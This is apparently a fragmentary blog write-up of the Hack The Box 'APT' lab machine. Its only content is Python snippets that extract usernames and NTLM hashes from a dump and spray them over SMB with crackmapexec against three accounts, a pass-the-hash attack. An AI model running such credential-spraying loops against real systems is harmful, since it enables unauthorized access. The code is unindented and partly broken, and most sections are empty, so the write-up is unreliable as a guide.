Hack The Box — APT

What we will do ?

1. Information Gathering

2. Scanning

#Get all usernames in separated file names = []
with open("hashes.txt", "r") as lines:
for line in lines:
name = line.split(":")[0]
names.append(name)
new_names = []
for line in names:
if line not in new_names:
new_names.append(line)
for line in new_names:
print line
#Get all hashes
with open("hashes.txt", "r") as lines:
for line in lines:
pass_hash = line.split(":")
first = pass_hash[3]
second = pass_hash[2]
if first:
print first
else:
print second
import subprocess
users = ["henry.vinson", "APT$", "Administrator"]
with open("hashed_passwords.txt","r") as hashes:
i = 0
user = users[0]
for hhash in hashes:
user = users[i]
print("[====[" + user + "]====]")
subprocess.call("crackmapexec --verbose smb apt.htb -u " + user + " -H " + hhash, shell=True)
i = i + 1

3. Gaining Access

4. Maintaining Access

Congrats ❤

Stay in touch

--

--

Offensive Security Enthusiast — twitter @eslam3kll

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store